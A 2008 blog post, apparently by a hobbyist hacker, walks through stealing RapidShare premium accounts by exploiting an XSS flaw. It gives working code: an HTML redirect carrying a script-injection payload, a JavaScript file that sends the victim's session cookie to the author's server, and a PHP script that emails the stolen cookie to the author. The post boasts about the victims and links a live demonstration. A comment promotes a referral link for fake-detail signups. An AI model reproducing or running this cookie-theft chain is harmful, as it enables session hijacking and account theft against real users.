Hacking into rapid share

After a long i decided to blog… i regularly download stuff from RS but the bad thing about it is that it allow limited downloading with free account and the evil thing about it is that you cant download concurrently and have to wait for long if you have recently downloaded stuff. i managed to get a RS premium account from one of my friend aka b3ast he’s from PCIA some hacking related team. I logged in as a premium user and it allowed me to download stuff but i got curious to get more RS accounts in the mean while i visited xssed and found there are couple of xss vulnerabilities that exist in Rapid share and they didn’t even bothered to fix them now the next thing to do is to search through what can we do with the xss while i was logged in with the premium account in firefox i did alert(”+document.cookie); guess what it showed me a cookie with my premium credentials.. “cool” for a guy a like me and Very bad for the guy who actually paid for the RS Premium account ) Now what next i have to make that xss to get me some RS premium accounts.

I wrote a java script in an html page that will forward user to rapidshare xss vulnerable page.

<script>
var my_var = “https://ssl.rapidshare.com/cgi-bin/folderadmin.cgi?login=
%22%3E%3Cscript%20src%3D’http://sufism.com.pk/javas.js’%3E%3C/script%3E”;
window.location= my_var;

</script>

Next thing was to get javas.js to forward the cookie to my email for that javas.js would look some thing like this.

var my_var = “http://www.sufism.com.pk/rs.php?cook=”;
my_var = my_var + document.cookie;
window.location = my_var;

saved it as a javas.js in sufism.com.pk/javas.js

now for the rs.php i wrote a small script in it

<?php
if ( isset($_GET[’cook’]) )
{
mail(’batmangenious[at]gmail[dot]com’,’Rapidshare Preminum account’,$_GET[’cook’]);
}
header(’Location: http://www.rapidshare.com/’);
?>

Now if some one visited the html page and if he/she is logged in to his/her rs premium account i will get an email with his/her rs account neat… isnt it ;)

The demonstration of it is available at http://sufism.com.pk/rapid.html

Regards

Yasir.

~ by funmarkaz on February 2, 2008.

Posted in Hacking
Tags:

2 Responses to “Hacking into rapid share”

  1. The best way to get Rapidshare accounts: Dont download anything…its all full of viruses….i have had to format my pc 2 times because of them. The safest way to get a RS account is to sign up at http://xlurls.com/114/, u can use fake info if u like, then choose an RS account as ur free sign up gift…its valid for 1 month. Simple

    Rsfinder said this on February 5, 2008 at 9:55 pm

  2. Not a bad idea.

    funmarkaz said this on February 10, 2008 at 3:59 pm

Leave a Reply